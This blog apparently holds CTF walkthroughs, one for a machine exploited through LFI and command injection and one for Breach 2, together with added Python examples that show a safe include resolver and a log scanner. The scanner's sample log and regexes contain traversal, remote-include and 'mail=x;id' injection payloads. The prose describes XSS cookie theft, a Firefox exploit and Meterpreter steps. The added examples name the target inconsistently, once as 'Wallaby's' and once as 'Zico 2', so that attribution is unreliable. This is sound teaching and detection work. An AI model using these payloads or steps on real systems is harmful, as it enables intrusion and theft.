<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROh9z1ipEhBwrFm1QLI0p8o8iLe1dMrjwbaECHrNyDTkl1v-2XFqT7UrmKWGI1zbdzZbsZsY39kT-BNGTrh4wKW6xz1lfG4yCd7wq0Nz8Zp9jvrNo6xkEa4Akrwu29wb9CCN6nUZhv-A/s1600/nmap-p-sV-v.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROh9z1ipEhBwrFm1QLI0p8o8iLe1dMrjwbaECHrNyDTkl1v-2XFqT7UrmKWGI1zbdzZbsZsY39kT-BNGTrh4wKW6xz1lfG4yCd7wq0Nz8Zp9jvrNo6xkEa4Akrwu29wb9CCN6nUZhv-A/s400/nmap-p-sV-v.png" width="400" /></a></div>
<br />
Great, the result gave us very juicy information: the open ports and the versions of the services hosted on them.<br />
<br />
Let's begin our penetration test for web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiavrYBOp43qg9c73o0NuJBJMq7B4blnWqpXtAQeFms3ju4t1CNAwMWzTH9SByMwlwsBB8C5oY_HqwevVxb-a_Fz-sfwmSQjMnYmRDWD8AVppa4Z9izIecJt-pIJmftuB2XAKVG_1bpkaQ/s1600/web_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiavrYBOp43qg9c73o0NuJBJMq7B4blnWqpXtAQeFms3ju4t1CNAwMWzTH9SByMwlwsBB8C5oY_HqwevVxb-a_Fz-sfwmSQjMnYmRDWD8AVppa4Z9izIecJt-pIJmftuB2XAKVG_1bpkaQ/s320/web_1.png" width="320" /></a></div>
<br />
Interesting, isn't it? Let's try the <b>test</b> username.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2YWSNFHTCq5FYRkNEeEpDQSbvgR1WP3saOj7F900Yr4GxSV5MbyTuuEhOHMbCzv7xQjfWhaLV9Vcq1WNxnj1oSCqQ36kApbeS2QJw-VefrxcfIsvyNfU3e5c4-lq0-Dv-_P94-6Fy-Io/s1600/web_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2YWSNFHTCq5FYRkNEeEpDQSbvgR1WP3saOj7F900Yr4GxSV5MbyTuuEhOHMbCzv7xQjfWhaLV9Vcq1WNxnj1oSCqQ36kApbeS2QJw-VefrxcfIsvyNfU3e5c4-lq0-Dv-_P94-6Fy-Io/s400/web_2.png" width="400" /></a></div>
<br />
Our username is reflected in the application, hmmm. Clicking "<b>Start the CTF!</b>" redirects us to another page<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6CuJrvC_SfCFvVx2ao5o6H87SYvNmk6bQjNu5DNFbPeCFmQAvyNT0K24PtGMTDGVcuVjUIgNLDhFVvkaTMNQd0nSrq-9wNHHEDvgaYf4Z71xc3pVlNKoN2jpY5S7z5j3JuW2TyA41YL4/s1600/web_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6CuJrvC_SfCFvVx2ao5o6H87SYvNmk6bQjNu5DNFbPeCFmQAvyNT0K24PtGMTDGVcuVjUIgNLDhFVvkaTMNQd0nSrq-9wNHHEDvgaYf4Z71xc3pVlNKoN2jpY5S7z5j3JuW2TyA41YL4/s640/web_3.png" width="640" /></a></div>
<br />
Nothing interesting? Look at the URL: we can use the <b>page</b> parameter to try LFI or RFI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlqA5fhNzUneXX6e9IPo_7DgJmJL890oeMtOmH4X8wWMqQetk4DDwF42uHCf9U7AR6he4vrjkpdD9Rh1ZlVb-AV0lNGb1CuWcJGZsyYEZPba5t4MWeSakJVtzj2NvC4atShbHWek5jzxw/s1600/web_etc_passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlqA5fhNzUneXX6e9IPo_7DgJmJL890oeMtOmH4X8wWMqQetk4DDwF42uHCf9U7AR6he4vrjkpdD9Rh1ZlVb-AV0lNGb1CuWcJGZsyYEZPba5t4MWeSakJVtzj2NvC4atShbHWek5jzxw/s640/web_etc_passwd.png" width="640" /></a></div>
<br />
Bingo! This parameter is vulnerable to LFI! But unfortunately, right after that I got...<br />
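The include behind the <b>page</b> parameter is PHP and isn't reproduced on the page, so this added Python example (mine, not Wallaby's code) shows the same traversal with a file read: <b>page=../../etc/passwd</b> escapes the pages directory when the parameter is simply joined onto a path, and the hardened resolver canonicalises the result with <b>os.path.realpath</b>, refuses anything outside the base directory, and then applies an explicit allowlist of page names. The directory layout, the page names and the fake passwd line are constructed for the demo.<br />

```python
import os
import tempfile

ALLOWED_PAGES = {"home", "contact", "start"}   # hypothetical page names for the demo


def vulnerable_include(base, page):
    """The page name is glued onto a directory path, as a naive include($dir.$page) would.
    '../' segments walk out of the pages directory, so ../../etc/passwd gets served (LFI).
    An absolute page name is just as bad: os.path.join() discards base for '/etc/passwd'."""
    with open(os.path.join(base, page)) as fh:
        return fh.read()


def escapes_base(base, page):
    """True when the canonical path of base/page is not inside base.  realpath() collapses
    '..' and symlinks; commonpath() avoids the classic startswith() mistake, where
    /srv/www2 would pass as being under /srv/www."""
    root = os.path.realpath(base)
    target = os.path.realpath(os.path.join(root, page))
    return os.path.commonpath([root, target]) != root


def safe_include(base, page):
    """Containment check first, then an allowlist of the pages that may be included."""
    if escapes_base(base, page):
        raise PermissionError(f"path escapes pages directory: {page!r}")
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"unknown page {page!r}")
    with open(os.path.join(os.path.realpath(base), page)) as fh:
        return fh.read()


def demo():
    """Build www/pages/home and a fake etc/passwd (both constructed) in a scratch
    directory and return what each resolver serves for a traversal request."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "www", "pages")
        os.makedirs(pages)
        with open(os.path.join(pages, "home"), "w") as fh:
            fh.write("<h1>home</h1>")
        os.makedirs(os.path.join(tmp, "etc"))
        with open(os.path.join(tmp, "etc", "passwd"), "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed sample line
        traversal = "../../etc/passwd"
        results = {"vulnerable": vulnerable_include(pages, traversal)}
        for label, page in (("safe_traversal", traversal), ("safe_unknown", "admin")):
            try:
                results[label] = safe_include(pages, page)
            except PermissionError as exc:
                results[label] = str(exc)
        results["safe_home"] = safe_include(pages, "home")
        return results


if __name__ == "__main__":
    for label, served in demo().items():
        print(f"{label:15s} {served!r}")
```

The allowlist alone would already stop this particular request, but the containment check is kept because it also covers the cases an allowlist is easy to get wrong about: a page name that is itself a symlink out of the tree, or an absolute path, both of which <b>realpath</b> plus <b>commonpath</b> catch. For PHP the equivalent is to map the parameter to a fixed file name through an array rather than to include what the client sent.<br />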
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnES8Lb9DTgmisQ0wrjF0T_TCpdR6fkt5LV_1lczw45vEPA1G7ExzrzZJ0XVzkhWV1RVdiLbVSayMJEVjAxW2W4RsmiYxbSt8eCunVEJAI4TG0xWh0xKRWR9ItgFGRIH3DRmunCqpcaOs/s1600/web_dupa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnES8Lb9DTgmisQ0wrjF0T_TCpdR6fkt5LV_1lczw45vEPA1G7ExzrzZJ0XVzkhWV1RVdiLbVSayMJEVjAxW2W4RsmiYxbSt8eCunVEJAI4TG0xWh0xKRWR9ItgFGRIH3DRmunCqpcaOs/s320/web_dupa.png" width="320" /></a></div>
<br />
It's not an issue with my network connection :-( I am confused, so let's try nmap again.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAGYj6LMhdlg13AxPdHD2sMNkv983qcIBzkiSyi7ci3Mev2xQ9jPwrCuKT8e6FqwWkruFfal2gf5CmR5aQNGDJP-DRB9O-4RGEbNiDf1LC95x89pzgKG3Yuup0EKTBXB2kkdI8WVjRKXM/s1600/nmap_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAGYj6LMhdlg13AxPdHD2sMNkv983qcIBzkiSyi7ci3Mev2xQ9jPwrCuKT8e6FqwWkruFfal2gf5CmR5aQNGDJP-DRB9O-4RGEbNiDf1LC95x89pzgKG3Yuup0EKTBXB2kkdI8WVjRKXM/s400/nmap_2.png" width="400" /></a></div>
<br />
Wow! Port 80 is no longer open, but we can see that a new port has been opened - <b>60080</b>! Let's investigate this port!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO6TNIc_oAXpFaEZmsHzGJQjgh489H7bbUGAbtBfamcR6wl_9YB_t2RAARz7i3VWYdzcseTY_dKcogrmsSAeKIIp4FrG8kAkbmT1HJBGtJwjwIKfmLq6hmg6gqj8aBe_r-a6IM5fWMkcM/s1600/web_21.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO6TNIc_oAXpFaEZmsHzGJQjgh489H7bbUGAbtBfamcR6wl_9YB_t2RAARz7i3VWYdzcseTY_dKcogrmsSAeKIIp4FrG8kAkbmT1HJBGtJwjwIKfmLq6hmg6gqj8aBe_r-a6IM5fWMkcM/s320/web_21.png" width="320" /></a></div>
<br />
Looking for some useful URLs, I tried this URL address, which I know:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sKPFmZ0r10GQIiyWvdatj9r-sunZFeY7NRo02C6JjgdiUlg0T-aHiJlyrfm_xbqik51Yafw0D3Y6jiuz6S66jXoT2VoRU1xCNitENKbUTQ34d-yukMZOgp-QXe5hFUQ4h33PUtHCrrQ/s1600/lfi2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sKPFmZ0r10GQIiyWvdatj9r-sunZFeY7NRo02C6JjgdiUlg0T-aHiJlyrfm_xbqik51Yafw0D3Y6jiuz6S66jXoT2VoRU1xCNitENKbUTQ34d-yukMZOgp-QXe5hFUQ4h33PUtHCrrQ/s640/lfi2.png" width="640" /></a></div>
<br />
Bingo! There is also an LFI vulnerability here! Trying to read <b>/etc/shadow</b>, I got no result.<br />
I spent a lot of time searching for a method or for files that I would be able to display; in the end I guessed the <b>mailer</b> file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7xJyCVKG6X3WZRLFPXHBlWIkX9mR1OoQwiqlp6jUBN2r-Z08MUzDCqBN4yjebhY5rVNoklF-NanpVBF1Wh4ysRTjTbDO5EChUrJu28o7nDnF9vbHkgDB01wB12y-EY2mRlHGvsfqAdTc/s1600/mailer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7xJyCVKG6X3WZRLFPXHBlWIkX9mR1OoQwiqlp6jUBN2r-Z08MUzDCqBN4yjebhY5rVNoklF-NanpVBF1Wh4ysRTjTbDO5EChUrJu28o7nDnF9vbHkgDB01wB12y-EY2mRlHGvsfqAdTc/s320/mailer.png" width="320" /></a></div>
<br />
Interesting, let's look at the source code:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp3hCJo-FxOhS5JN4uWEkPNwcdehJ8fajSFY79rXTpJsqHz85jnfTDAMost9Thmm62_dO-k3J1fqcRfdsvuXb8h8q4qLye-0OZYeu_M4UdAsvIfgGhkMCw6DLGB3hAjnYZqSXWO0Wyl4Y/s1600/sc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp3hCJo-FxOhS5JN4uWEkPNwcdehJ8fajSFY79rXTpJsqHz85jnfTDAMost9Thmm62_dO-k3J1fqcRfdsvuXb8h8q4qLye-0OZYeu_M4UdAsvIfgGhkMCw6DLGB3hAjnYZqSXWO0Wyl4Y/s640/sc.png" width="640" /></a></div>
<br />
Hmmm, in the source code we can see that the mailer file takes a <b>mail</b> parameter. Let's play with it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAalYiZyX4OjFDU9x4N_QBqoCVp3dR2C23mXutql8aCcfbOy1xTBF4849_tsW8-QXQyt913dT9XEq3qs88RnbJaRCJYI-UVuGZx6v9dTrfbYjBiiEGUCA30lVyH2S0RpgfPXYehqzQCPo/s1600/dasd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAalYiZyX4OjFDU9x4N_QBqoCVp3dR2C23mXutql8aCcfbOy1xTBF4849_tsW8-QXQyt913dT9XEq3qs88RnbJaRCJYI-UVuGZx6v9dTrfbYjBiiEGUCA30lVyH2S0RpgfPXYehqzQCPo/s400/dasd.png" width="400" /></a></div>
<br />
Excellent! The <b>mail</b> parameter can execute bash commands!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDF8yBKMw-pwDvKYDuk7JqaFQ-wEOXWH1mT6FHArUhpfZW6sJcCbuQ2HDOYQvuWdCkdAXNz6BZolGOyDepGZFoG4CHNrja9qpHwYqE-oyvp_JirVCEPUb27qehqs0E7obsaZ3H8If0b7o/s1600/rs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDF8yBKMw-pwDvKYDuk7JqaFQ-wEOXWH1mT6FHArUhpfZW6sJcCbuQ2HDOYQvuWdCkdAXNz6BZolGOyDepGZFoG4CHNrja9qpHwYqE-oyvp_JirVCEPUb27qehqs0E7obsaZ3H8If0b7o/s640/rs.png" width="640" /></a></div>
<br />
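The two request patterns above (traversal in the <b>page</b> include parameter and shell metacharacters in the <b>mail</b> parameter) are easy to pick out of a web server access log. The script below is an added example, not code from the original post or from the Zico 2 machine: only the parameter names come from the walkthrough, while the script names view.php and mailer.php, the hosts and the log lines are constructed for the example.<br />

```python
"""Spotting the Zico 2 request patterns in a web server log.

Added example (not code from the original post or from the Zico 2 machine):
it scans Apache-style access-log lines for traversal / stream-wrapper values
in the ``page`` include parameter and for shell metacharacters in the ``mail``
parameter. Parameter names come from the walkthrough; the script names
(view.php, mailer.php), hosts and log lines are constructed for this example.
"""
import re
from urllib.parse import unquote

# Parameter names observed in the walkthrough: page -> file include,
# mail -> value handed to a shell command.
INCLUDE_PARAMS = {"page"}
SHELL_PARAMS = {"mail"}

# Local include abuse: "../" (also with backslashes), absolute paths into
# /etc or /proc, and PHP stream wrappers used to turn LFI into source
# disclosure or code execution.
TRAVERSAL_RE = re.compile(
    r"(\.\.[/\\])|(^/(etc|proc)/)|(^(php|data|expect|file)://)",
    re.IGNORECASE,
)
# Remote include: the include parameter points at another host.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Characters that end or chain a shell command, or expand a subshell.
SHELL_META_RE = re.compile(r"[;&|`$\n]")

# Simplified Apache combined-log line: host, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_param(value, rounds=3):
    """URL-decode repeatedly (bounded) so double encoding cannot hide '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(target):
    """Split the query part of a request target on '&' only.

    Done by hand rather than with urllib.parse.parse_qs because older Python
    versions also split on ';', which would hide a 'mail=x;id' payload.
    """
    _, _, query = target.partition("?")
    pairs = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            pairs.append((unquote(name), value))
    return pairs


def classify_request(target):
    """Return [(parameter, finding), ...] for one request target."""
    findings = []
    for name, raw in parse_query(target):
        value = decode_param(raw)
        if name in INCLUDE_PARAMS:
            if TRAVERSAL_RE.search(value):
                findings.append((name, "lfi-traversal"))
            if REMOTE_RE.search(value):
                findings.append((name, "rfi-remote-url"))
        if name in SHELL_PARAMS and SHELL_META_RE.search(value):
            findings.append((name, "command-injection"))
    return findings


def scan_log(lines):
    """Yield (host, target, finding) for every suspicious request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than crash
        for name, finding in classify_request(m.group("target")):
            yield m.group("host"), m.group("target"), finding


# Constructed sample log, modelled on the walkthrough (not real captures).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Oct/2017:10:01:02 +0200] "GET /view.php?page=tools HTTP/1.1" 200 512',
    '10.0.0.5 - - [26/Oct/2017:10:01:09 +0200] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1337',
    '10.0.0.5 - - [26/Oct/2017:10:02:31 +0200] "GET /view.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1337',
    '10.0.0.5 - - [26/Oct/2017:10:02:50 +0200] "GET /view.php?page=http://10.0.0.5/x.txt HTTP/1.1" 200 1337',
    '10.0.0.5 - - [26/Oct/2017:10:03:10 +0200] "GET /mailer.php?mail=zico@example.test HTTP/1.1" 200 20',
    '10.0.0.5 - - [26/Oct/2017:10:03:44 +0200] "GET /mailer.php?mail=x;id HTTP/1.1" 200 96',
]

if __name__ == "__main__":
    for host, target, finding in scan_log(SAMPLE_LOG):
        print(f"{finding:18} {host} {target}")
```

The double-encoded line is caught only because the value is decoded more than once; a single decode would leave it looking harmless.<br />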
Great! We have a limited shell! Let's investigate what privileges we have.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirF-qwc1SOYiYvL1iTXUcMNrvHDVjNIMWpIRjz8JjUUekfHnLg3kGePzjxs_BZD8YV2624eYSx5k8Um80D6ZB6-oHPq2ZwjI-pmD_6usRaOCo3oWFhKOfVh7_litI3mOWQe7Dt9BG6mf8/s1600/sudo_l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirF-qwc1SOYiYvL1iTXUcMNrvHDVjNIMWpIRjz8JjUUekfHnLg3kGePzjxs_BZD8YV2624eYSx5k8Um80D6ZB6-oHPq2ZwjI-pmD_6usRaOCo3oWFhKOfVh7_litI3mOWQe7Dt9BG6mf8/s640/sudo_l.png" width="640" /></a></div>
<br />
Good, we have full control over the firewall, so let's flush the rules.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaeu_ODFqVLvOnEqxu-9CVXrOG4XvmtzLlqbPj2Qm8n8b-TxO3RRDGOGftuG3VlJ7XLj38tKyke-imHtelqrHIiF-w3uSNKM6mLVQPZXTJ1bRFnZQvJX65bgLC3PXZydXIBMo2aXb5sk/s1600/iptables.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaeu_ODFqVLvOnEqxu-9CVXrOG4XvmtzLlqbPj2Qm8n8b-TxO3RRDGOGftuG3VlJ7XLj38tKyke-imHtelqrHIiF-w3uSNKM6mLVQPZXTJ1bRFnZQvJX65bgLC3PXZydXIBMo2aXb5sk/s400/iptables.png" width="400" /></a></div>
<br />
OK, let's try to connect to the IRC server (port 6667), which was filtered before our action.<br />
Now we are able to connect to the IRC server.<br />
<br />
[TBU] <br />
<br />
<br />
<b>I am back!</b> (published 2016-12-08T11:08:00+01:00, updated 2016-12-08T11:08:48+01:00)<br />
<br />
Hi everyone,<br />
<br />
I would like to say - I am back! I will work on this blog as effectively as I can :-)<br />
<br />
I was working on my <b>Penetration with Kali Linux</b> course, so I was unable to publish new posts on my blog.<br />
<br />
I will probably add new posts this week :-)<br />
<br />
<b>Breach 2 challenge</b> (published 2016-08-16T22:08:00+02:00, updated 2016-08-24T11:38:20+02:00)<br />
<br />
Hello,<br />
"Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way."<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXq3ISg_H_jdcMfm6QucrXLjnyjRaH-rVWE6FK7AVJXDzz-ruFdNVtWYyr6HPGiQAXjKmCHmVEnm-dp7-43bvsk1lYnuWxPqngwC1Eej56qqeKOews3h-9BEiCf6yUeiJBykc0zxol12M/s1600/scann.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXq3ISg_H_jdcMfm6QucrXLjnyjRaH-rVWE6FK7AVJXDzz-ruFdNVtWYyr6HPGiQAXjKmCHmVEnm-dp7-43bvsk1lYnuWxPqngwC1Eej56qqeKOews3h-9BEiCf6yUeiJBykc0zxol12M/s1600/scann.png" /></a></div>
<br />
Good, we can see that there is no NFS service behind RPC. Let's check SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcTMYrlVuic1QnOliRMdGEjKjivUeGQdAfZVLi-3Nj5q4yM9_Q2cpiB97z5CokWO92uOo5BRMaGFA5JTbdbuwHhAspyv2mmh93bwXA9xlU0b65RlPejd9SZwiASb4XXvVcLaA7QY8sBE/s1600/ssh_banner.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcTMYrlVuic1QnOliRMdGEjKjivUeGQdAfZVLi-3Nj5q4yM9_Q2cpiB97z5CokWO92uOo5BRMaGFA5JTbdbuwHhAspyv2mmh93bwXA9xlU0b65RlPejd9SZwiASb4XXvVcLaA7QY8sBE/s1600/ssh_banner.png" /></a></div>
<br />
Hmmm, a blog? The scanning phase did not discover an HTTP port. Let's try the password inthesource for the SSH username peter.<br />
Voila!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgefbsvDJbzp-F7oM4yO1xQq5pKj77JgJs6Eg1pBO7WbEPMNK9xrRvd-1H5So_0riunYarxwM643AonsUp7pKEZhi3oMLWmdQMB4RBSw3yjGkm-imAdx8HLBnlquQRrR8r3eKpXNHneEMI/s1600/ssh_open.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgefbsvDJbzp-F7oM4yO1xQq5pKj77JgJs6Eg1pBO7WbEPMNK9xrRvd-1H5So_0riunYarxwM643AonsUp7pKEZhi3oMLWmdQMB4RBSw3yjGkm-imAdx8HLBnlquQRrR8r3eKpXNHneEMI/s1600/ssh_open.png" /></a></div>
<br />
Excellent! Port 80 is now open! As far as I know, Apache 2.4.10 has no dedicated publicly known exploit. So, let's examine the web application (the blog):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvyqFvm9tDMJW6fkJ4f7CXqwzwrnrxRivhcNDG_o7uSUV_fhkbkmDZAtIvzUE_W_FhXLk8aSrl7eIgI0ZCI2UpSgIhD1E4-hNJJd4OJH1fNV09DBcQl2JA9cLdayFuzrCeE-bilc6O8gE/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvyqFvm9tDMJW6fkJ4f7CXqwzwrnrxRivhcNDG_o7uSUV_fhkbkmDZAtIvzUE_W_FhXLk8aSrl7eIgI0ZCI2UpSgIhD1E4-hNJJd4OJH1fNV09DBcQl2JA9cLdayFuzrCeE-bilc6O8gE/s640/www.png" width="640" /></a></div>
<br />
OK, the source code doesn't contain credentials or anything like that - only a hint that the web application administrators do not trust users. We know two exploits for the BlogPHP CMS - Stored XSS and Remote Privilege Escalation. For me the second is more interesting.<br />
Unfortunately it does not work, so let's try to exploit the XSS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtZSHUd-NvY3yv8zqlIEjesrwTG5L1eSxgV26QyayS_R7v5EgIV23i7DDI4PqOkBLiDQvzMsmDRlLn_KkEktGJCdi-J83BDQavzMH54-bhsHkR7gprJCm857VAC2hj1mVCFXrFWDPWzm0/s1600/hook.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtZSHUd-NvY3yv8zqlIEjesrwTG5L1eSxgV26QyayS_R7v5EgIV23i7DDI4PqOkBLiDQvzMsmDRlLn_KkEktGJCdi-J83BDQavzMH54-bhsHkR7gprJCm857VAC2hj1mVCFXrFWDPWzm0/s1600/hook.png" /></a></div>
<br />
We are probably on the right track.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBWYnZaN4N0LU_tBUY-1a13Rl_XZ9FSvI6Vepq8STXDE0wlMB-0DmLLWgeTBlsLPkvmiPcLTubO-CljWbN7U0ahOoNXIeQ-UIdE3Ej7rxsC5_X-UgGuG2dammt_QVNMf2Yd-u_Kp0DyE/s1600/cookie.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBWYnZaN4N0LU_tBUY-1a13Rl_XZ9FSvI6Vepq8STXDE0wlMB-0DmLLWgeTBlsLPkvmiPcLTubO-CljWbN7U0ahOoNXIeQ-UIdE3Ej7rxsC5_X-UgGuG2dammt_QVNMf2Yd-u_Kp0DyE/s640/cookie.png" width="640" /></a></div>
<br />
Good! We have got the administrator's cookies. I tried to use the stolen credentials, but without success... Let's look at the Firefox version - 15.0. It is so old.<br />
Let's look for an exploit. BINGO - CVE-2013-1710!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXtb-YVhCvz_RpBOgcpJT8qScpN6u2u5ayl3r2arCZi3dtjYiZg8a9MSEGA9_KDNpSVHOmm2hRG4un23P-yiPAe4tG4lEWKJQsGi4cWsJr9viIeejROXr6ipWXD-NN0LWUFfztwFXgPI/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXtb-YVhCvz_RpBOgcpJT8qScpN6u2u5ayl3r2arCZi3dtjYiZg8a9MSEGA9_KDNpSVHOmm2hRG4un23P-yiPAe4tG4lEWKJQsGi4cWsJr9viIeejROXr6ipWXD-NN0LWUFfztwFXgPI/s640/exploit.png" width="640" /></a></div>
<br />
Great! We have got a limited shell! Let's upgrade it to a Meterpreter session.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4dFHTHj_t8hhU2Bu1K-nqWsOwGfHPYOyXmi-KLZQ4qn3YQducYW-AWSEkWGUkM33IwQ2-ku3buGzPddTy_RdTVz6LTmws7X3588YJhY8kCA7Qib97Fwy8BN8XRfCj8DPtvw8_MkJQJA/s1600/meter.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4dFHTHj_t8hhU2Bu1K-nqWsOwGfHPYOyXmi-KLZQ4qn3YQducYW-AWSEkWGUkM33IwQ2-ku3buGzPddTy_RdTVz6LTmws7X3588YJhY8kCA7Qib97Fwy8BN8XRfCj8DPtvw8_MkJQJA/s640/meter.png" width="640" /></a></div>
<br />
So, good! I have got a shell and ran <b>netstat -antp</b> to find what services are running on our victim machine. Port 2323 is listening, so I decided to perform remote port forwarding to my port 7777, and<br />
<div class="separator" style="clear: both; text-align: center;">
